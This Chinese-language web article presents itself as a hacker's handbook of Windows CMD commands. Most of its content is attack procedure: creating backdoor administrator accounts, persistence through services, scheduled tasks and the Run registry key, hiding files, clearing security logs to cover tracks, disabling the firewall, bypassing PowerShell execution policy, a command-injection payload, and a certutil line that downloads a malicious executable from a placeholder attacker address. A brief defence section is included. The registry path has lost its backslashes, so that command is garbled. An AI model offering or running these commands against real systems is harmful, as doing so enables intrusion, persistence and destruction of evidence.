黑客必备CMD命令实战指南与技巧全解析从入门到精通完全手册
发布日期:2025-04-10 05:15:12 点击次数:101

以下为黑客必备CMD命令实战指南与技巧的全解析手册,结合渗透测试、系统管理及安全防御场景,整合Windows命令行工具的核心应用:
一、基础必备命令
1. 系统信息探测
`systeminfo`:获取操作系统版本、补丁、内存等详细信息,用于快速评估目标环境。
`hostname`:查看当前计算机名称,辅助定位目标身份。
`tasklist`:列出所有运行进程,结合`taskkill /im [进程名]`终止恶意进程。
`whoami /priv`:查看当前用户权限,识别是否具备提权条件。
2. 网络配置与连通性测试
`ipconfig /all`:显示详细网络配置(IP、MAC、DNS),分析目标网络拓扑。
`ping -n 4 [IP]`:测试网络连通性,`-t`参数可持续发包用于压力测试。
`tracert [域名/IP]`:追踪路由路径,识别网络中间节点。
`netstat -ano`:显示所有活动连接及对应进程PID,定位可疑端口。
二、渗透与权限管理
1. 用户与组操作
`net user [用户名] [密码] /add`:创建新用户,常用于后门账户植入。
`net localgroup administrators [用户] /add`:将用户加入管理员组实现提权。
`net user [用户] /active:no`:禁用账户,阻止目标恢复访问。
2. 服务与进程控制
`sc create [服务名] binPath= "[恶意程序路径]"`:创建自启动服务持久化攻击。
`net start/stop [服务名]`:启停服务,如关闭防火墙`net stop "Windows Defender Firewall"`。
`wmic process call create "[命令]"`:绕过部分监控执行命令。
3. 文件与日志操作
`attrib +h +s [文件]`:隐藏文件并设为系统属性,规避常规检查。
`wevtutil cl security`:清除安全日志,掩盖攻击痕迹(需管理员权限)。
`type NUL > [文件]`:清空文件内容,破坏日志或配置文件。
三、进阶实战技巧
1. 命令注入与拼接
利用逻辑操作符执行多命令:
`&`:顺序执行(无论前命令是否成功)
`&&`:仅前命令成功时执行后续命令
`|`:将前命令输出作为后命令输入(如`dir | find "pass"`过滤敏感文件)。
案例:在Web漏洞中注入`127.0.0.1 && net user`,实现远程命令执行。
2. 网络侦查与数据窃取
`arp -a`:查看ARP缓存表,定位局域网内活跃主机。
`nslookup -type=MX [域名]`:查询邮件服务器记录,辅助钓鱼攻击。
`certutil -urlcache -split -f http://恶意地址/后门.exe`:通过合法工具下载恶意文件。
3. 隐蔽通信与持久化
`netsh advfirewall add rule name="允许RDP" dir=in action=allow protocol=TCP localport=3389`:添加防火墙规则开放端口。
`schtasks /create /tn "任务名" /tr "[恶意程序路径]" /sc hourly`:创建定时任务维持访问。
四、防御与反制手段
1. 检测异常命令行为
监控`net user`、`net group`等账户操作命令。
分析`taskkill /f /im antivirus.exe`等终止安全进程的行为。
2. 加固系统配置
禁用高危服务:`sc config [服务名] start= disabled`。
限制命令执行权限:通过组策略(`gpedit.msc`)禁用CMD或PowerShell。
3. 日志分析与溯源
使用`eventvwr.msc`查看安全事件ID 4688(进程创建记录)。
定期导出日志:`wevtutil epl Security log_backup.evtx`。
五、工具与自动化脚本
1. 内置工具活用
`PowerShell -ExecutionPolicy Bypass -File script.ps1`:绕过策略执行脚本。
`reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v "后门" /t REG_SZ /d "[路径]"`:注册表自启动。
2. 第三方工具整合
结合Nmap、Mimikatz等工具扩展CMD功能(需上传至目标系统)。
附:常用命令速查表
| 场景 | 命令示例 | 功能 |
||--|-|
| 网络诊断 | `netstat -ano | find "ESTABLISHED"` | 查看活跃连接及进程PID |
| 权限维持 | `schtasks /create /tn Update /tr "恶意程序"` | 创建定时任务 |
| 文件隐藏 | `attrib +h +s +r secret.txt` | 隐藏文件并设为系统只读属性 |
| 日志清除 | `wevtutil cl System` | 清除系统日志 |
| 进程伪装 | `wmic process call create "calc.exe"` | 以计算器进程为掩护执行命令 |
注意事项:
1. 部分命令需管理员权限执行,且可能触发安全告警。
2. 实战中需结合权限提升(如DLL注入、服务漏洞)扩大攻击面。
3. 防御者可通过禁用高危命令、部署EDR工具增强防护。
完整命令手册及案例可参考来源: